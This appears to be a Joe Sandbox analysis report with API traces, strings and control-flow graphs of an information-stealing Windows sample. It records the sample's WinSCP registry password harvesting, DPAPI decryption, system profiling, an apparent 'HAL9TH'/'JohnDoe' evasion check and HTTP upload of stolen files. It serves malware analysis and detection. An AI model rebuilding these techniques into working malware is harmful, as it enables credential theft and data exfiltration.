                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3118134B04208BFDB10DFA5D848B9EBFB9EF85714F1480B9E804EB251CB769506CB64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,HAL9TH,?,00401063,JohnDoe,00415B49), ref: 0040E65D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00401063,JohnDoe,00415B49), ref: 0040E664
                                                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,?), ref: 0040E678
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                              • String ID: HAL9TH
                                                                                                                                                                                                                                                              • API String ID: 1206570057-1811034163
                                                                                                                                                                                                                                                              • Opcode ID: dad54f3eeb76aaf9ab3917e628952378ff3586baf3244f5a3df97a0ddb187189
                                                                                                                                                                                                                                                              • Instruction ID: 3b6bb86c2aa7e6c860c7c69a7c5b7b6065036db9af3dab9ac7174578770e79df
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad54f3eeb76aaf9ab3917e628952378ff3586baf3244f5a3df97a0ddb187189
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D05EF6700204BFE7109BA5ED0DF9ABAFCEB84755F400065FB02D2291DAF099018A34
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ), ref: 0040E729
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E730
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E73F
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040E75D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                                                                              • Opcode ID: 2970ad804210b27692d63d95c1c219e29d2a4f61a4fb4e25faef3d96918d710d
                                                                                                                                                                                                                                                              • Instruction ID: ddcf64704f1bc3c6141f033c01d982c90cc94944e95df457e6d4af9f879a5c79
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2970ad804210b27692d63d95c1c219e29d2a4f61a4fb4e25faef3d96918d710d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36E09271700320BBDB1067B8FC4EF9A3B6EDB41725F100252FA15E21D0E6749D5487E6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406275
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040628D
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004062AB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2068576380-0
                                                                                                                                                                                                                                                              • Opcode ID: cadf5577c9b9691b71ad68239c0d5a22a5f3d8c6918a2dc9e96d3e60350b608e
                                                                                                                                                                                                                                                              • Instruction ID: afe4829b9d1edcfe5df11625f36b51efeaebfb5f47dcb0a2a1b211f2eb5da05d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cadf5577c9b9691b71ad68239c0d5a22a5f3d8c6918a2dc9e96d3e60350b608e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF011DB6900218AFDF10EFE8DC448EEBBB9FF48600F10056AF945E7250D37599508B50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                                                              • Opcode ID: 7294e20f52773795ff6104e9a9063163d126c4ee991cbe2967d73750617d30e0
                                                                                                                                                                                                                                                              • Instruction ID: 30066c338acff39604fbe4a50ee4d830962821b77274f0eb823570a350decf8b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7294e20f52773795ff6104e9a9063163d126c4ee991cbe2967d73750617d30e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AD05EB180021DDBCF10DBA0FC8AE8977BDAB04308F4001A1AB00F2090E374E62E8BD9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040AFEE
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B017
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B037
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B04B
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B05F
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B06E
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B07C
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B08D
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040B0B5
                                                                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040B0DD
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040B12C
                                                                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040B149
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B15D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040B164
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040B175
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,Host: ), ref: 0040B183
                                                                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?), ref: 0040B1A6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040B1B2
                                                                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040B1DC
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040B1FF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,:22), ref: 0040B21A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423F5C), ref: 0040B228
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,Login: ), ref: 0040B236
                                                                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?), ref: 0040B259
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040B265
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423F74), ref: 0040B273
                                                                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?), ref: 0040B296
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,Password: ), ref: 0040B2A0
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423C4E), ref: 0040B2B2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040B2EC
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423F90), ref: 0040B305
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423F94), ref: 0040B313
                                                                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040B338
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B349
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B357
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040B36E
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040B3C0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$memset$Value$H_prolog$EnumHeapOpen$AllocCreateObjectProcessSingleThreadWaitlstrlen
                                                                                                                                                                                                                                                              • String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                              • API String ID: 4023705341-1250616252
                                                                                                                                                                                                                                                              • Opcode ID: c39dc6e039f8f81134bae3f85386a3e706bce3670fd253d2e2172a390f3ba86d
                                                                                                                                                                                                                                                              • Instruction ID: 42636ee3264d0198b12f3c4f2769946958562b84b0d07412612f3ed8d39ca566
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c39dc6e039f8f81134bae3f85386a3e706bce3670fd253d2e2172a390f3ba86d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65C126B1D0011EAFDF01DBD1ED46EEFBB7DEB04349F10046AB501B2191D7789A588BA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 76 404360-40445f _EH_prolog call 40e321 call 403a07 call 40f82e call 40e521 lstrlen call 40e521 call 40f82e call 40e2ea * 5 StrCmpCA 99 404461 76->99 100 404462-404467 76->100 99->100 101 404487-4045a7 call 40f5de call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3ef call 40e463 call 40e3a8 call 40e355 * 3 call 40e463 call 40e3ef call 40e3a8 call 40e355 * 2 InternetConnectA 100->101 102 404469-404481 call 40e521 InternetOpenA 100->102 107 404cba-404cf7 call 40f516 * 2 call 40e4db * 4 call 40e321 101->107 171 4045ad-4045e0 HttpOpenRequestA 101->171 102->101 102->107 136 404cfc-404d7f call 40e355 * 9 107->136 173 404cb1-404cb4 InternetCloseHandle 171->173 174 4045e6-4045e8 171->174 173->107 175 404600-404c07 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 4020a3 call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e521 lstrlen call 40e521 lstrlen GetProcessHeap HeapAlloc call 40e521 lstrlen call 40e521 memcpy call 40e521 lstrlen memcpy call 40e521 lstrlen call 40e521 * 2 lstrlen memcpy call 40e521 lstrlen call 40e521 HttpSendRequestA call 40f516 HttpQueryInfoA 174->175 176 4045ea-4045fa InternetSetOptionA 174->176 383 404c09-404c16 call 40e2ea 175->383 384 404c1b-404c2d call 40f4f9 175->384 176->175 383->136 389 404d80-404d8d call 40e2ea 384->389 390 404c33-404c38 384->390 389->136 392 404c74-404c89 InternetReadFile 390->392 393 404c3a-404c3f 392->393 394 404c8b-404ca1 call 40e521 StrCmpCA 392->394 393->394 397 404c41-404c6f call 40e463 call 40e3a8 call 40e355 393->397 401 404ca3-404ca4 ExitProcess 394->401 402 404caa-404cab InternetCloseHandle 394->402 397->392 402->173
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00404365
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004043D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040F82E: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F852
                                                                                                                                                                                                                                                                • Part of subcall function 0040F82E: GetProcessHeap.KERNEL32(00000000,?,?,004043C8,?,?,?,?,?,?), ref: 0040F85F
                                                                                                                                                                                                                                                                • Part of subcall function 0040F82E: HeapAlloc.KERNEL32(00000000,?,004043C8,?,?,?,?,?,?), ref: 0040F866
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004239B7,004239B3,004239AB,004239A7,004239A6), ref: 00404457
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404477
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040459C
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004045D6
                                                                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004045FA
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00423A70,00000000,?,?,00000000), ref: 00404B0A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404B1C
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B2E
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00404B35
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404B47
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00404B5A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00404B71
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00404B7B
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404B8C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404BA5
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00404BB2
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,00000000), ref: 00404BC7
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404BD8
                                                                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404BFF
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404C81
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00404C99
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00404CA4
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404CB4
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                              • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                              • API String ID: 2658035217-3618031631
                                                                                                                                                                                                                                                              • Opcode ID: 476ab2a1d45761da070b74ae7643efb6b3ad890e74c36cd9fde27e782e7ecd9a
                                                                                                                                                                                                                                                              • Instruction ID: 6206ef52eafb39f864dc7eb2f23dd82a4f663a761a49c87c1cc0ae04d9a46c57
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476ab2a1d45761da070b74ae7643efb6b3ad890e74c36cd9fde27e782e7ecd9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE62667180014CEADB05EBE2C995ADEBBB8AF18308F14446EF501731C2EB786B59DB75
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
